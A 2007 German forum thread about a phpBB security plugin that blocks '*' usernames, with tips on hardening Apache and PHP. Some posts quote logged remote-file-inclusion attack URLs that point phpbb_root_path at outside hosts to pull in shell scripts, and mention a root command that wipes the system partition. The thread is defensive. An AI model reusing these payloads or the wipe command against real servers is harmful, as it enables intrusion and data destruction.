Neuanmeldungen mit * sind nicht mehr möglich

**Tom** · 20. Juli 2007

Allgemeine Mitteilung:

Neuanmeldungen mit Usernamen, die mit einem * beginnen, werden von Jerry automatisch abgeblockt, d.h. sie erreichen nicht die Datenbank, ich muß sie also auch nicht mehr löschen.

*Freaky* hatte sozusagen noch Glück, daß sie sich noch vor Jerry angemeldet hat.

VALUSO · 20. Juli 2007

Gut zu wissen. Aber ich will mich eh nicht neuanmelden

Lara · 20. Juli 2007

Zitat von VALUSO

Gut zu wissen. Aber ich will mich eh nicht neuanmelden

Ich schon, nein Scherz

Schwarzer · 20. Juli 2007

Das finde ich sehr Gut.Ich würde es nicht schön finden wenn ein *Schwarzer anmelden würde.

*Freaky* · 20. Juli 2007

Juhu, ich bin einzigartig xD

_ZaeBoN_ · 20. Juli 2007

Zitat von Schwarzer

Das finde ich sehr Gut.Ich würde es nicht schön finden wenn ein *Schwarzer anmelden würde.

immer dieser rassismus im forum!! was hast du dagegen, wenn sich ein afrikaner hier anmelden würde?

ironie

Atreyu · 21. Juli 2007

Zitat von ZaeBoN

immer dieser rassismus im forum!! was hast du dagegen, wenn sich ein afrikaner hier anmelden würde?

ironie

Alles anzeigen

**Tom** · 21. Juli 2007

Nachtrag:

Es geht prinzipiell darum, daß man mit dem Sternchen phpBB2 austricksen kann, * und $ sind ja allgemeine Platzhalter in MS-DOS, die es natürlich auch in php gibt, aber Jerry ist so klug, und erkennt das, falls da jemand Blödsinn macht.

In MS-DOS würde z.B. Tomb* alles bedeuten, was nach Tomb noch irgendwas dran hat, also Tomb Raider, Tomb Fan usw. Würde man z.B. in der Suchmaske Cheat* eingeben, sucht er alles, was mit Cheat anfängt.

lara-tr · 21. Juli 2007

Zitat von *Freaky*

Juhu, ich bin einzigartig xD

Ich dachte das wüsstest Du schon

*Freaky* · 21. Juli 2007

Zitat von lara-tr

Ich dachte das wüsstest Du schon

oh, danke, wie lieb von dir

lara-tr · 21. Juli 2007

Na klar

TSF · 25. Juli 2007

* ist ein ganz böses Pflaster, steht auf meiner Seite auch auf der Blacklist, kann Ärger machen.

Stellt euch nur mal vor, was passieren würde, wenn jemand in den Shell des Servers eindringen würde, dort die Rechte des Superusers root erlangt und dann diesen Befehl ausführt:

Zitat

### /*

Damit wird die komplette Systempartition des Servers gelöscht! :x

Tom:
den CrackerTracker habe ich bei mir schon seit der Version 1 drin, mein Forum wurde noch nie gehackt. Täglich gibt es neue Einbruchsversuche, der CTracker blockt aber alles.

Insgesamt gab es bei mir shcon über 16000 fehlgeschlagene Hackerversuche.

**Tom** · 25. Juli 2007

Tja, sicher ist sicher.

TSF · 25. Juli 2007

Bei Einbruchsstellen im Server selber kann Jerry aber auch nicht viel machen. Von daher sollte man auch den Server (besonders Apache und PHP) absichern.

**Tom** · 25. Juli 2007

Tja, mein Server hat eine Firewall und macht jeden Monat ein Backup, was er sonst noch so treibt, weiß ich eigentlich nicht so genau...

TSF · 25. Juli 2007

Eine Firewall macht meiner Meinung nach keinen Sinn, es reicht, wenn du alle Ports geschlossen hast und alle unnötigen Dienste beendest, dann kommt nichts nach draußen. Und für Apache mod_security (gegen allgemeine Angriffe) und mod_evasive (gegen DoS-Attacken).

Außerdem sollte PHP im safe_mode und mit open_basedir laufen und kritische Funktionen deaktiviert werden (besonderes register_globals ist eine Lücke ohne Ende).

Wenn bei dir register_globals aktiviert ist (was ich nicht hoffe), dann brauchst du keine Firewall, da der Server dann von außen erreichbar ist, die Firewall kann da auch nichts machen.

**Tom** · 26. Juli 2007

Zitat von TSF

Insgesamt gab es bei mir shcon über 16000 fehlgeschlagene Hackerversuche.

Nun gut, einige der "abgewehrten Angriffe" sind "hausgemachte" Probleme, bzw. eher harmlos, aber ansonsten sind da im Logmanager schon recht interessante Meldungen über blockierte Aktionen, z.B.:

Zitat

/phpBB2/index.php/install/upgrade.php?phpbb_root_path=http://www.webuty.de/images/cmd.txt?

Was wollte mir da dieses Web-Utility installieren

TSF · 26. Juli 2007

Mit diesen Befehl wollte einer bei dir ein Shellscript ausführen und externen Code einschleusen, damit ein neues Programm auf den Server installiert wird.

Hättest du den CTracker nicht installiert, wäre diese Attacke wahrscheinlich geglückt und man hätte fremden Code einschleusen können (also sprich ein fremdes Programm installiert). Aber der CTracker hat das erfolgreich geblockt, keine Panik für dich.

Ein hoch auf den CrackerTracker!!

Solche Angriffe habe ich bei mir auch täglich.

lara-tr · 26. Juli 2007

Zitat von TSF

Mit diesen Befehl wollte einer bei dir ein Shellscript ausführen und externen Code einschleusen, damit ein neues Programm auf den Server installiert wird.

Hättest du den CTracker nicht installiert, wäre diese Attacke wahrscheinlich geglückt und man hätte fremden Code einschleusen können (also sprich ein fremdes Programm installiert). Aber der CTracker hat das erfolgreich geblockt, keine Panik für dich.

Ein hoch auf den CrackerTracker!!

Solche Angriffe habe ich bei mir auch täglich.

Alles anzeigen

Ein hoch auf = Jerry

TSF · 26. Juli 2007

Das gute:
Jerry wehrt die Angriffe nicht nur ab, sondern loggt auch noch User-Agent, Uhrzeit, Referrer und IP-Adresse des Angreifers. Damit kann man genau den User finden, im User-Agent werden nämlich Betriebssystem und Browserversion gespeichert.

Diese Infos loggt Jerry alle mit und speichert sie ab, damit der Admin die Möglichkeit hat, diese Daten für weitere Schritte zu verwenden.

Bei mir habe ich öfters diese Attacke:

Zitat

/activity.php?page=high_scores&mode=highscore&game_name=monkeylander&sid=fd46/language/lang_english/lang_activity.php?phpbb_root_path=http://evilarmy.hostcentric.com/vop.pid?

Da wurde versucht, $phpbb_root_path aus zutricksen (sogenannte includes Lücke, wenn man Dateien von außerhalb aufrufen kann und externen Code einschleusen kann). Dort wollte einer bei mir einen neuen Webserver installieren.

Aber Jerry macht solchen Leuten einen Strich durch die Rechnung.

Teilen